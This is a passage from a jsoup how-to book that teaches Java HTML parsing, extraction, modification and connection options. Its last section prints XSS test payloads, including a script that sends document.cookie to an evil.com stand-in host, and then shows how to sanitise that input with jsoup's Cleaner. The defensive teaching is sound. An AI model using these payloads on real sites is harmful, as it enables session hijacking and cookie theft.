Instant jsoup How-to

Chapter 1. Instant Jsoup How-to

Welcome to Instant Jsoup How-to. Many websites and services provide information through RSS, Atom, or a web service API; however, lots of sites don't provide such facilities. That is why many HTML parsers have emerged to support web scraping. Jsoup, one of the popular HTML parsers for Java developers, is a powerful framework that gives developers an easy way to extract and transform HTML content. This book collects the recipes you need to grab information from the web.

Giving input for parser (Must know)

HTML data for parsing can come from different types of sources, such as a local file, a string, or a URI. Let's have a look at how we can handle these types of input for parsing using Jsoup.

How to do it...

Create the Document class structure from Jsoup, depending on the type of input.

If the input is a string, use:

String html = "<html><head><title>jsoup: input with string</title></head><body>Such an easy task.</body></html>";
Document doc = Jsoup.parse(html);

If the input is from a file, use:

try {
    File file = new File("index.html");
    Document doc = Jsoup.parse(file, "utf-8");
} catch (IOException ioEx) {
    ioEx.printStackTrace();
}

If the input is from a URL, use:

Document doc = Jsoup.connect("http://www.example.com").get();

Import the required classes at the top of the file.

import java.io.File;
import java.io.IOException;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

Note

The complete example source code for this section is in \source\Section01.

The API reference for this section is available at the following location:

http://jsoup.org/apidocs/org/jsoup/Jsoup.html

How it works...

Basically, all the inputs will be given to the Jsoup class to parse.

For an HTML string, you just need to pass the HTML string as parameter for the method Jsoup.parse().

For an HTML file, two parameters are passed to Jsoup.parse(). The first one is the File object, which points to the specified HTML file; the second one is the character set of the file. There is an overload of this method with an additional third parameter, Jsoup.parse(File file, String charsetName, String baseUri). The baseUri is the URL from which the HTML file was retrieved; it is used to resolve relative paths or links.

For a URL, you need to use the Jsoup.connect() method. It returns an object that implements the Connection interface. Through this object, you can easily get the content of the page by calling the Connection.get() method, which sends the request and parses the response.

The previous example is pretty easy and straightforward. Each of these parsing calls returns a Document object, which represents the DOM structure of an HTML page, where the root node starts from <html>.
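To make the role of the base URI more concrete, here is a minimal sketch that parses a string with Jsoup.parse(String html, String baseUri) and resolves a relative link. The class name ParseInputSketch, the helper firstAbsoluteLink(), and the example.com URLs are made up for illustration and are not part of the book's sample project.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;

// Hypothetical helper class, for illustration only.
final class ParseInputSketch {

    // Parses an HTML string and resolves the first link against the given base URI.
    static String firstAbsoluteLink(String html, String baseUri) {
        Document doc = Jsoup.parse(html, baseUri);
        Element link = doc.select("a[href]").first();
        // first() returns null when nothing matched, so guard before using it.
        return link == null ? "" : link.absUrl("href");
    }

    public static void main(String[] args) {
        String html = "<html><head><title>jsoup: input with string</title></head>"
                + "<body><a href=\"page.html\">Next</a></body></html>";
        // Without a base URI the document still parses; only link resolution needs it.
        Document doc = Jsoup.parse(html);
        System.out.println(doc.title());
        System.out.println(firstAbsoluteLink(html, "http://www.example.com/docs/"));
    }
}
```

The same idea applies to the file overload: passing a base URI as the third argument lets absUrl() turn relative paths into full URLs.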

There's more...

Besides receiving the well-formed HTML as input, Jsoup library also supports input as a body fragment. This can be seen at the following location:

http://jsoup.org/apidocs/org/jsoup/Jsoup.html#parseBodyFragment(java.lang.String)
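As a rough illustration, the following sketch feeds an incomplete fragment to Jsoup.parseBodyFragment() and reads it back from the generated <body>. The class and method names are hypothetical; only the Jsoup calls come from the library.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

// Hypothetical helper class, for illustration only.
final class BodyFragmentSketch {

    // Wraps a fragment in a full document shell (html, head, body).
    static Document parseFragment(String fragment) {
        return Jsoup.parseBodyFragment(fragment);
    }

    public static void main(String[] args) {
        // The <p> tag is deliberately left unclosed.
        Document doc = parseFragment("<p>Hello <b>world</b>");
        // The fragment ends up inside <body>, with the <p> tag closed by the parser.
        System.out.println(doc.body().html());
        System.out.println(doc.body().text());
    }
}
```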


Extracting data using DOM (Must know)

As the input is ready for extraction, we will begin with HTML parsing using the DOM method.

Note

If you don't know what DOM is, you can have a quick start with the DOM tutorial at:

http://www.w3schools.com/htmldom/

Let's move on to the details of how it works in Jsoup.

Getting ready

This section will parse the content of the page at http://jsoup.org.

The index.html file in the project is provided if you want to have a file as input, instead of connecting to the URL.

How to do it...

The following screenshot shows the page that is going to be parsed:

By viewing the source code for this HTML page, we know the site structure.

The Jsoup library is quite supportive of the DOM navigation method; it provides ways to find elements and extract their contents efficiently.

Create the Document class structure by connecting to the URL.
```
Document doc = Jsoup.connect("http://jsoup.org").get();
```

Navigate to the menu tag whose class is nav-sections.

Elements navDivTag = doc.getElementsByClass("nav-sections");

Get the list of all <a> tags inside the menu.

Elements list = navDivTag.get(0).getElementsByTag("a");

Extract content from each Element class in the previous menu list.

for (Element menu : list) {
    System.out.print(String.format("[%s]", menu.html()));
}

The output should look like the following screenshot after running the code:

The complete example source code for this section is placed at \source\Section02.

Note

The API reference for this section is available at:

http://jsoup.org/apidocs/org/jsoup/nodes/Element.html

How it works...

Let's have a look at the navigation structure:

html > body.n1-home > div.wrap > div.header > div.nav-sections > ul > li.n1-news > a

The div class="nav-sections" tag is the parent of the navigation section, so by using getElementsByClass("nav-sections"), it will move to this tag. Since there is only one tag with this class value in this example, we only need to extract the first found element; we will get it at index 0 (first item of results).

Elements navDivTag = doc.getElementsByClass("nav-sections");

The Elements object in Jsoup represents a collection (Collection<>) or a list (List<>); therefore, you can easily iterate through this object to get each element, which is known as an Element object.

When at a parent tag, there are several ways to get to the children. Navigate from subtag <ul>, and deeper to each <li> tag, and then to the <a> tag. Or, you can directly make a query to find all the <a> tags. That's how we retrieved the list that we found, as shown in the following code:

Elements list = navDivTag.get(0).getElementsByTag("a");

The final part is to print the extracted HTML content of each <a> tag.

Be careful with the list value: even if the navigation fails to find any element, the returned list is never null (it is simply empty); therefore, it is good practice to check the size of the list before doing any other task.

Additionally, the Element.html() method is used to return the HTML content of a tag.
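The size check can be sketched as follows. The markup is a hypothetical, simplified stand-in for the real page's menu, and the SafeNavigationSketch class and its menuLabels() method are invented for this example.

```java
import java.util.ArrayList;
import java.util.List;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

// Hypothetical helper class, for illustration only.
final class SafeNavigationSketch {

    // Simplified stand-in for the navigation markup discussed in this recipe.
    static final String HTML =
            "<div class=\"nav-sections\"><ul>"
          + "<li class=\"n1-news\"><a href=\"/news\">News</a></li>"
          + "<li><a href=\"/bugs\">Bugs</a></li>"
          + "</ul></div>";

    // Returns the inner HTML of every <a> under the first element with the given class.
    static List<String> menuLabels(String html, String className) {
        List<String> labels = new ArrayList<String>();
        Document doc = Jsoup.parse(html);
        Elements containers = doc.getElementsByClass(className);
        // The result is never null, but it may be empty; get(0) would then throw.
        if (containers.isEmpty()) {
            return labels;
        }
        for (Element link : containers.get(0).getElementsByTag("a")) {
            labels.add(link.html());
        }
        return labels;
    }

    public static void main(String[] args) {
        System.out.println(menuLabels(HTML, "nav-sections"));
        System.out.println(menuLabels(HTML, "no-such-class"));
    }
}
```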

There's more...

Jsoup is quite a powerful library for DOM navigation. Besides the methods mentioned previously, the Element class supports other ways to find and extract elements. The following are the common methods for DOM navigation:

| Method | Description |
| --- | --- |
| `getElementById(String id)` | Finds an element by ID, searching the element that calls this method and everything under it. |
| `getElementsByTag(String tagName)` | Finds elements with the specified tag name, including and recursively under the element that calls this method. |
| `getElementsByClass(String className)` | Finds elements that have this class, including or under the element that calls this method. Case insensitive. |
| `getElementsByAttribute(String key)` | Finds elements that have a named attribute set. Case insensitive. This method has several relatives, such as `getElementsByAttributeStarting(String keyPrefix)`, `getElementsByAttributeValue(String key, String value)`, and `getElementsByAttributeValueNot(String key, String value)`. |
| `getElementsMatchingText(Pattern pattern)` | Finds elements whose text matches the supplied regular expression. |
| `getAllElements()` | Finds all elements under the specified element (including self and children of children). |
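A few of these lookups can be tried out on a small in-memory document. This is only a sketch: the markup, the DomLookupSketch class, and its helper methods are hypothetical, while the getElement... calls are the ones listed in the table.

```java
import java.util.regex.Pattern;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

// Hypothetical helper class, for illustration only.
final class DomLookupSketch {

    // Made-up markup, loosely modelled on the menu used in this recipe.
    static final String HTML =
            "<div id=\"menu\" class=\"nav-sections\">"
          + "<a href=\"/news\" title=\"Latest\">News</a>"
          + "<a href=\"/download\">Download</a>"
          + "</div>";

    // Counts the <a> tags under the element with the given ID (0 if the ID is missing).
    static int linkCountUnderId(String id) {
        Element root = Jsoup.parse(HTML).getElementById(id);
        return root == null ? 0 : root.getElementsByTag("a").size();
    }

    // Returns the text of the first element whose href equals the given value.
    static String textForHref(String href) {
        Elements hits = Jsoup.parse(HTML).getElementsByAttributeValue("href", href);
        return hits.isEmpty() ? "" : hits.first().text();
    }

    public static void main(String[] args) {
        Document doc = Jsoup.parse(HTML);
        System.out.println(linkCountUnderId("menu"));
        System.out.println(textForHref("/news"));
        System.out.println(doc.getElementsByAttribute("title").size());
        // Prints the tag name of every element whose text matches the pattern.
        for (Element e : doc.getElementsMatchingText(Pattern.compile("^Down"))) {
            System.out.println(e.tagName());
        }
    }
}
```

Note that getElementById() returns a single Element (or null), whereas the getElementsBy... methods return an Elements list that may be empty.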

It is also worth listing the methods that are used to extract content from an HTML element. The following table shows the common ones:

| Method | Description |
| --- | --- |
| `id()` | This retrieves the ID value of an element. |
| `className()` | This retrieves the class name value of an element. |
| `attr(String key)` | This gets the value of a specific attribute. |
| `attributes()` | This is used to retrieve all the attributes. |
| `html()` | This is used to retrieve the inner HTML value of an element. |
| `data()` | This is used to retrieve the data content, usually applied for getting content from the `<script>` and `<style>` tags. |
| `text()` | This is used to retrieve the text content. This method will return the combined text of all inner children and removes all HTML tags, while the `html()` method returns everything between its open and closed tags. |
| `tag()` | This retrieves the tag of the element. |
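The difference between these accessors is easiest to see side by side. The sketch below uses a made-up snippet of HTML; ExtractContentSketch, summarize(), and scriptSource() are hypothetical names chosen for this example.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Element;

// Hypothetical helper class, for illustration only.
final class ExtractContentSketch {

    // Made-up markup: one paragraph with nested markup and one inline script.
    static final String HTML =
            "<p id=\"intro\" class=\"lead\">Hello <b>there</b></p>"
          + "<script>var x = 1;</script>";

    // Combines tag(), id(), className(), and text() for the element with the given ID.
    static String summarize(String html, String elementId) {
        Element e = Jsoup.parse(html).getElementById(elementId);
        if (e == null) {
            return "";
        }
        return e.tag().getName() + "#" + e.id() + "." + e.className() + " text=" + e.text();
    }

    // Reads the content of the first <script> tag through data() rather than text().
    static String scriptSource(String html) {
        Element script = Jsoup.parse(html).getElementsByTag("script").first();
        return script == null ? "" : script.data();
    }

    public static void main(String[] args) {
        System.out.println(summarize(HTML, "intro"));
        System.out.println(scriptSource(HTML));
        // html() keeps the nested <b> tag, whereas text() strips it.
        System.out.println(Jsoup.parse(HTML).getElementById("intro").html());
    }
}
```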

The following code prints the corresponding relative path of each <a> tag found in the menu list to demonstrate the use of the attr() method to get attribute content.

System.out.println("\nMenu and its relative path:");
for(Element menu: list) {
  System.out.println(String.format("[%s] href = %s", menu.html(), menu.attr("href")));
}

Extracting data using CSS selector (Must know)

Instead of DOM navigation, this recipe uses the CSS selector method. Basically, a CSS selector identifies elements in the same way that a stylesheet targets them for styling. Let's see how this works.

Getting ready

If you don't know the CSS selector syntax yet, I suggest finding some tutorials or guidelines to learn about it first.

Note

The following two links will be helpful for you to learn about CSS selector syntax:

How to do it...

Now we will try to use CSS selector syntax to do the same task that DOM navigation does. Basically, it is the same code as in the previous recipe but is a little different in the way we parse the content.

Create the Document class structure by loading the URL:
```
Document doc = Jsoup.connect(mUrl).get();
```
Select the <div> tag with the class attribute nav-sections:
```
Elements navDivTag = doc.select("div.nav-sections");
```
Select all the <a> tags:
```
Elements list = navDivTag.select("a");
```

Retrieve the results from the list:

for(Element menu: list) {
    System.out.print(String.format("[%s]", menu.html()));
}

As you try to execute this code, it will produce the same result as the previous recipe by using DOM navigation.

The complete example source code for this section is available at \source\Section03.

How it works...

It works like a charm! Well, there is actually no magic here. It's just that the selector query will give the direction to the target elements and Jsoup will find it for you. The select() method is written for this task so that you don't have to care a lot about it.

Through the query doc.select("div.nav-sections"), the Document class will try to find and return all the <div> tags that have class name equal to nav-sections.

It is even simpler when trying to find the children; Jsoup will look up every child and their children to find the tags that match the selector. That's how all the <a> tags are selected in step 3. Compared to DOM navigation, it is much simpler to use and easier to understand. Developers should know HTML page structure in order to use the CSS selector query.
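The two select() calls from the steps above can also be collapsed into a single query, because a selector may describe the whole path at once. The following is a minimal sketch on hypothetical markup; SelectorSketch and texts() are names invented for this example.

```java
import java.util.ArrayList;
import java.util.List;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Element;

// Hypothetical helper class, for illustration only.
final class SelectorSketch {

    // Simplified stand-in for the navigation markup discussed in this recipe.
    static final String HTML =
            "<div class=\"nav-sections\"><ul>"
          + "<li class=\"n1-news\"><a href=\"/news\">News</a></li>"
          + "<li><a href=\"/bugs\">Bugs</a></li>"
          + "</ul></div>";

    // Runs a CSS query and collects the text of every matching element.
    static List<String> texts(String html, String cssQuery) {
        List<String> result = new ArrayList<String>();
        for (Element e : Jsoup.parse(html).select(cssQuery)) {
            result.add(e.text());
        }
        return result;
    }

    public static void main(String[] args) {
        // Descendant combinator: every <a> anywhere under div.nav-sections.
        System.out.println(texts(HTML, "div.nav-sections a"));
        // Child combinator: only an <a> that is a direct child of li.n1-news.
        System.out.println(texts(HTML, "li.n1-news > a"));
    }
}
```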

There's more...

Please refer to the following pages for the usage of all CSS selector syntax to use in your application:

Transforming HTML elements (Must know)

Basically, an HTML parser does two things: extraction and transformation. While extraction was described in the previous recipes, this recipe is going to talk about transformation, or modification.

How to do it...

In this section, I'm going to show you how to use Jsoup library to modify the following HTML page:

<html>
  <head>
    <title>Section 04: Modify elements' contents</title>
  </head>
  <body>
    <h1>Jsoup: the HTML parser</h1>
  </body>
</html>

The result, with some minor changes added, looks as follows:

<html>
  <head>
    <title>Section 04: Modify elements' contents</title>
    <meta charset="utf-8" />
  </head>
  <body class=" content">
    <h1>Jsoup: the HTML parser</h1>
    <p align="center">Author: Johnathan Hedley</p>
    <p>It is a very powerful HTML parser! I love it so much...</p>
  </body>
</html>

Perform the following tasks:

Add a <meta> tag to <head>
Add a <p> tag for body content description
Add a <p> tag for body content author
Add an attribute to the <p> tag of the author
Add the class for the <body> tag

The previous tasks will be implemented in the following way:

Add a <meta> tag to <head>.

Element tagMetaCharset = new Element(Tag.valueOf("meta"), "");
tagMetaCharset.attr("charset", "utf-8");
doc.head().appendChild(tagMetaCharset);

Add a <p> tag for body content description.

Element tagPDescription = new Element(Tag.valueOf("p"), "");
tagPDescription.text("It is a very powerful HTML parser! I love it so much...");
doc.body().appendChild(tagPDescription);

Add a <p> tag for body content author.

tagPDescription.before("<p>Author: Johnathan Hedley</p>");

Add an attribute to the <p> tag of the author.

Element tagPAuthor = doc.body().select("p:contains(Author)").first();
tagPAuthor.attr("align", "center");

Add a class for the <body> tag.
```
doc.body().addClass("content");
```

The complete example source code for this section is available at \source\Section04.

How it works...

As you see, the <meta> tag doesn't exist, so we need to create a new Element that represents the <meta> tag.

Element tagMetaCharset = new Element(Tag.valueOf("meta"), "");
tagMetaCharset.attr("charset", "utf-8");

The constructor of the Element object requires two parameters: one is the Tag object, and the other is the base URI of the element. Usually, the base URI passed when creating the Element object is an empty string; you can supply a real base URI when you want to specify where this element belongs. One thing worth remembering is that the Tag class doesn't have a public constructor, so developers need to create a Tag object through the static method Tag.valueOf(String tagName).

In the next line, the attr(String key, String value) method is used to set the attribute value, where key is the name of the attribute.

doc.head().appendChild(tagMetaCharset);

Instead of requiring you to look up the <head> or <body> tag, Jsoup provides two methods, head() and body(), to get these two elements directly, which makes it very convenient to append a new child to the <head> tag. If you want to insert the <meta> tag before <title>, you can use the prependChild() method instead. The call to appendChild() adds a new element at the end of the child list, while prependChild() adds it as the first child.
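The difference between the two calls can be checked with a small sketch that lists the children of <head> after each kind of insertion. The PrependMetaSketch class and its headChildOrder() method are hypothetical; the document is a cut-down version of this recipe's page.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.parser.Tag;

// Hypothetical helper class, for illustration only.
final class PrependMetaSketch {

    // Inserts a <meta charset> tag into <head> and returns the resulting child order.
    static String headChildOrder(boolean prepend) {
        Document doc = Jsoup.parse(
                "<html><head><title>Section 04</title></head><body></body></html>");
        Element meta = new Element(Tag.valueOf("meta"), "");
        meta.attr("charset", "utf-8");
        if (prepend) {
            doc.head().prependChild(meta);  // becomes the first child, before <title>
        } else {
            doc.head().appendChild(meta);   // becomes the last child, after <title>
        }
        StringBuilder order = new StringBuilder();
        for (Element child : doc.head().children()) {
            if (order.length() > 0) {
                order.append(",");
            }
            order.append(child.tagName());
        }
        return order.toString();
    }

    public static void main(String[] args) {
        System.out.println(headChildOrder(true));
        System.out.println(headChildOrder(false));
    }
}
```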

Element tagPDescription = new Element(Tag.valueOf("p"), "");
tagPDescription.text("It is a very powerful HTML parser! I love it so much...");
doc.body().appendChild(tagPDescription);

The second task is performed by basically the same code.

Sometimes, you may find it too complicated to create objects and add them to their parents; Jsoup also lets you go the other way and insert elements directly from an HTML string.

tagPDescription.before("<p>Author: Johnathan Hedley</p>");

The third task is done by directly adding an HTML string as a sibling of the previous <p> tag. The before(String html) method (a before(Node node) overload also exists) is similar to prependChild(Node node), but it inserts a preceding sibling instead of a first child.

The next task is to add the align=center attribute to the author <p> tag that we've just added. Up to this point, you have seen various ways to navigate to this tag; one easy way is to use a CSS selector to get the first <p> tag that contains the text Author.

Element tagPAuthor = doc.body().select("p:contains(Author)").first();
tagPAuthor.attr("align", "center");

The first line uses the :contains pseudo selector to find the tag, and the second line adds the attribute to it.

The final task can easily be achieved by using the addClass(String classname) method:

doc.body().addClass("content");

If you try to add an already existing class name, it won't add because Jsoup is smart enough to ensure that a class name only appears once in an element.
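This behavior is easy to verify with a short sketch that adds the same class twice and inspects the result. AddClassSketch and classAfterAddingTwice() are hypothetical names; the value is trimmed because some Jsoup versions may emit a leading space, as in the class=" content" output shown earlier.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

// Hypothetical helper class, for illustration only.
final class AddClassSketch {

    // Adds the same class name twice and returns the resulting class attribute, trimmed.
    static String classAfterAddingTwice(String className) {
        Document doc = Jsoup.parse(
                "<html><head></head><body><h1>Jsoup: the HTML parser</h1></body></html>");
        // addClass() returns the element itself, so the calls can be chained.
        doc.body().addClass(className).addClass(className);
        return doc.body().className().trim();
    }

    public static void main(String[] args) {
        System.out.println(classAfterAddingTwice("content"));
    }
}
```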

There's more...

What you previously saw is just a demonstration of the Jsoup library's capabilities in manipulating HTML elements contents through some common methods.

You will find more useful and convenient methods while working with Jsoup through its API reference page.

Miscellaneous Jsoup options (Should know)

Usually, developers only work with Jsoup's default options, unaware that it provides various other useful ones. This recipe will acquaint you with some commonly used options.

How to do it...

How to work with connection objects:
- Setting userAgent: It is very important to always specify userAgent when sending HTTP requests. What if the web page displays some information differently on different browsers? The result of parsing might be different.
```
Document doc = Jsoup.connect(url).userAgent("Mozilla/5.0 (Windows NT 6.1)").get();
```
Especially when using Jsoup in Android, you must always specify a user agent; otherwise, it won't work properly.
- When forced to work with different content types:
```
Document doc = Jsoup.connect(url).ignoreContentType(true).get();
```
By default, Jsoup only allows working with HTML and XML content type and throws exceptions for others. So, you will need to specify this properly in order to work with other content types, such as RSS, Atom, and so on.
- Configure a connection timeout:
```
Document doc = Jsoup.connect(url).timeout(5000).get();
```
The default timeout for Jsoup is 3000 milliseconds (three seconds). Zero indicates an infinite timeout.
- Add a parameter request to the connection:
```
Document doc = Jsoup.connect(url).data("author", "Pete Houston").get();
```
On dynamic websites, you often need to send parameters with the request; the data() method serves this purpose.
Note
Please refer to the following link for more information:
http://jsoup.org/apidocs/org/jsoup/Connection.html#data(java.lang.String, java.lang.String)
- Sometimes, the request must be sent as a POST:
```
Document doc = Jsoup.connect(url).data("author", "Pete Houston").post();
```
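These connection options can be chained on a single Connection before anything is sent. The sketch below only builds the request and prints its settings, so it needs no network access; ConnectionOptionsSketch and configure() are hypothetical names, and the URL is a placeholder.

```java
import org.jsoup.Connection;
import org.jsoup.Jsoup;

// Hypothetical helper class, for illustration only.
final class ConnectionOptionsSketch {

    // Builds a configured connection; nothing is sent until get(), post(), or execute().
    static Connection configure(String url) {
        return Jsoup.connect(url)
                .userAgent("Mozilla/5.0 (Windows NT 6.1)")
                .timeout(5000)
                .ignoreContentType(true)
                .data("author", "Pete Houston")
                .method(Connection.Method.POST);
    }

    public static void main(String[] args) {
        Connection conn = configure("http://www.example.com");
        // Inspect the prepared request instead of sending it.
        System.out.println(conn.request().method());
        System.out.println(conn.request().timeout());
        System.out.println(conn.request().header("User-Agent"));
        // To actually send it, one would call conn.execute().parse() or conn.post().
    }
}
```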
Setting the HTML output of the Document class.
This option works through the Document.OutputSettings class.
Note
Please refer to the following link for more information:
http://jsoup.org/apidocs/org/jsoup/nodes/Document.OutputSettings.html
This class outputs HTML text in a neat format with the following options:
- Character set: Get/set document charset
- Escape mode: Get/set escape mode of HTML output
- Indentation: Get/set indent amount for pretty printing (by space count)
- Outline: Enable/disable HTML outline mode
- Pretty print: Enable/disable pretty printing mode
For example, to display the HTML output with the charset set to utf-8, an indentation amount of four spaces, HTML outline mode enabled, and pretty printing enabled:
```
Document.OutputSettings settings = new Document.OutputSettings();
settings.charset("utf-8").indentAmount(4).outline(true).prettyPrint(true);
Document doc = … // create DOM object somewhere.
doc.outputSettings(settings);
System.out.println(doc.html());
```
After the output settings are applied to the Document, its content is rendered in the corresponding format; call the Document.html() method to get the resulting output.
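For a version of this that runs on its own, the sketch below parses a small in-memory document and renders it with different indentation amounts. OutputSettingsSketch and render() are hypothetical names, and the HTML string is made up for the example.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

// Hypothetical helper class, for illustration only.
final class OutputSettingsSketch {

    static final String HTML =
            "<html><head><title>Settings</title></head><body><h1>Jsoup</h1></body></html>";

    // Renders the document with pretty printing, outline mode, and the given indent width.
    static String render(String html, int indent) {
        Document doc = Jsoup.parse(html);
        Document.OutputSettings settings = new Document.OutputSettings();
        settings.charset("utf-8").indentAmount(indent).outline(true).prettyPrint(true);
        doc.outputSettings(settings);
        return doc.html();
    }

    public static void main(String[] args) {
        System.out.println(render(HTML, 4));
        System.out.println(render(HTML, 1));
    }
}
```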
Configure the parser type.
Jsoup provides two parser types: HTML parser and XML parser.
By default, it uses HTML parser. However, if you are going to parse XML such as RSS or Atom, you should change the parser type to XML parser or it will not work properly.
```
Document doc = Jsoup.connect(url).parser(Parser.xmlParser()).get();
```
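The parser type can also be chosen when parsing a string, through the Jsoup.parse(String html, String baseUri, Parser parser) overload. The sketch below uses a made-up RSS snippet to show why this matters: in HTML, <link> is an empty tag, so the HTML parser is not expected to keep the URL as the text of that element, whereas the XML parser does. XmlParserSketch and firstItemLink() are hypothetical names.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.parser.Parser;

// Hypothetical helper class, for illustration only.
final class XmlParserSketch {

    // Made-up RSS snippet with a single item.
    static final String RSS =
            "<rss><channel><item>"
          + "<title>First post</title>"
          + "<link>http://www.example.com/1</link>"
          + "</item></channel></rss>";

    // Returns the text of the first <link> inside an <item>, using the chosen parser.
    static String firstItemLink(boolean useXmlParser) {
        Document doc = useXmlParser
                ? Jsoup.parse(RSS, "", Parser.xmlParser())
                : Jsoup.parse(RSS);
        Element link = doc.select("item > link").first();
        return link == null ? "" : link.text();
    }

    public static void main(String[] args) {
        System.out.println("XML parser:  " + firstItemLink(true));
        System.out.println("HTML parser: " + firstItemLink(false));
    }
}
```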

There's more...

The previously mentioned options in Jsoup are important ones that the developers should know and make use of.

However, there are several more that you can try:

DataUtil: This provides methods to load a file or stream and transform it into a Document object. To know more about this class, go to the following location:
http://jsoup.org/apidocs/org/jsoup/helper/DataUtil.html
StringUtil: This provides methods to handle strings; for example, to search in an array, join a string array, or test a string. To know more about this class, go to the following location:
http://jsoup.org/apidocs/org/jsoup/helper/StringUtil.html
Validate: This provides methods to test objects, such as testing for empty, testing for null, and so on. To know more about this class, go to the following location:
http://jsoup.org/apidocs/org/jsoup/helper/Validate.html
Entities: This provides methods to test or get HTML entities. To know more about this class, go to the following location:
http://jsoup.org/apidocs/org/jsoup/nodes/Entities.html
Parser: This provides methods to parse HTML into a Document. To know more about this class, go to the following location:
http://jsoup.org/apidocs/org/jsoup/parser/Parser.html

Cleaning dirty HTML documents (Become an expert)

HTML documents are not always well formed. This might expose some vulnerabilities for hackers to attack, such as Cross-site scripting (XSS). Luckily, Jsoup has already provided some methods for cleaning these invalid HTML documents. Additionally, Jsoup is capable of parsing the incorrect HTML and transforming it into the correct one. Let's have a look at how we can make a well-formed HTML document.

Getting ready

If you've never heard about XSS before, I suggest you learn more about it to follow this section.

Note

The following pages will give you an idea of XSS:

How to do it...

Our task in this section is to clean the buggy, XSSed HTML:

<html>
  <head>
  <title>Section 05: Clean dirty HTML</title>
  <meta http-equiv="refresh" content="0;url=javascript:alert('xss01');">
  <meta charset="utf-8" />
  </head>

  <body onload=alert('XSS02')>
    <h1>Jsoup: the HTML parser</h1>
    <script src=http://ha.ckers.org/xss.js></script>
    <img """><script>alert("XSS03")</script>">
    <img src=# onmouseover="alert('xxs04')">
    <script/XSS src="http://ha.ckers.org/xss.js"></script>
    <script/src="http://ha.ckers.org/xss.js"></script>
    <iframe src="javascript:alert('XSS05');"></iframe>
    <img src="http://www.w3.org/html/logo/img/mark-only-icon.png" />
    <img src="www.w3.org/html/logo/img/mark-only-icon.png" />
  </body>
</html>

If you open this file in the Chrome or Firefox browser, you will see the XSS at work. Imagine that users open this XSSed HTML and are redirected to a page that hackers have total control over; the hackers could, for example, steal users' cookies, which is very dangerous.

<img """>
<script>
document.location = 'http://evil.com/steal.php?cookie=' + document.cookie;
</script>">

There are thousands of ways for XSS attacks to occur, so you should guard against them and clean the input; it's time for Jsoup to do its job.

Load the Document class structure.

File file = new File("index.html");
Document doc = Jsoup.parse(file, "utf-8");

Create a whitelist.

Whitelist allowList = Whitelist.relaxed();

Add more allowed tags and attributes.

allowList
  .addTags("meta", "title", "script", "iframe")
  .addAttributes("meta", "charset")
  .addAttributes("iframe", "src")
  .addProtocols("iframe", "src", "http", "https");

Create Cleaner, which will do the cleaning task.
```
Cleaner cleaner = new Cleaner(allowList);
```
Clean the dirty HTML.
```
Document newDoc = cleaner.clean(doc);
```
Print the new clean HTML.
```
System.out.println(newDoc.html());
```

This is the result of the cleaning:

<html>
  <head>
  </head>
  <body>
    <h1>Jsoup: the HTML parser</h1>
  <script>
  </script>
  <img />
  <script>
  </script>&quot;&gt;
  <img />
  <script>
  </script>
  <script>
  </script>
  <iframe>
  </iframe>
  <img src="http://www.w3.org/html/logo/img/mark-only-icon.png" />
  <img />
  </body>
</html>

Indeed, the resulting HTML is very clean and there is almost no script at all.

The complete example source code for this section is available at \source\Section05.

How it works...

The concept of cleaning dirty HTML in Jsoup is to identify the known safe tags and allow them in the result parse tree. These allowed tags are defined in Whitelist.

  Whitelist allowList = Whitelist.relaxed();
  allowList
  .addTags("meta", "title", "script", "iframe")
  .addAttributes("meta", "charset")
  .addAttributes("iframe", "src")
  .addProtocols("iframe", "src", "http", "https");

Here we define Whitelist, which is created through the relaxed() method and contains the following tags:

a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul

If you want to add more tags, use the method addTags(String… tags). As you can see, the list of tags created through relaxed() doesn't have <meta>, <title>, <script>, and <iframe>, so I added them to the list manually by using addTags().

If the allowed tags have the attributes, you should add the list of allowed attributes to each tag.

One special attribute is src, which contains a URL to a file, and it's always good practice to restrict its protocol to prevent inline scripting XSS. Consider the following line from the buggy HTML shown previously:

<iframe src="javascript:alert('XSS05');">
</iframe>

The attribute "src" is supposed to refer to a URL but it actually does not. The fix is to ensure the "src" value is acquired through HTTP or HTTPS. That is what the following line means:

  .addProtocols("iframe", "src", "http", "https");

You can chain the calls when adding tags or attributes.

While Whitelist provides the safe tag list, Cleaner, on the other hand, takes Whitelist as input to clean the input HTML:

  Cleaner cleaner = new Cleaner(allowList);
  Document newDoc = cleaner.clean(doc);

A new Document object is created once the cleaning is done.

There's more...

Cleaner only keeps the allowed HTML tags provided by Whitelist input; everything else is removed.

For convenience, Jsoup provides the following five predefined whitelists:

none(): This allows only text nodes, all HTML will be stripped
simpleText(): This allows only simple text formatting, such as b, em, i, strong, and u
basic(): This allows a fuller range of text nodes, such as a, b, blockquote, br, cite, code, dd, dl, dt, em, i, li, ol, p, pre, q, small, strike, strong, sub, sup, u, and ul, and appropriate attributes
basicWithImages(): This allows the same text tags as basic() and also allows the img tags, with appropriate attributes, with src pointing to http or https
relaxed(): This allows a full range of text and structural body HTML tags, such as a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul

Tags removed in <head>

If you look closely, you can see that everything inside the <head> tag is removed, even though you allowed those tags in the whitelist as shown in the previous code.

Note

At the time of writing, the current version of Jsoup is 1.7.2; see lines 45 and 46 of Cleaner.java on GitHub at the following location:

https://github.com/jhy/jsoup/blob/master/src/main/java/org/jsoup/safety/Cleaner.java#L45

The cleaner keeps and parses only <body>, not <head> as shown in the following code snippet:

  if (dirtyDocument.body() != null)
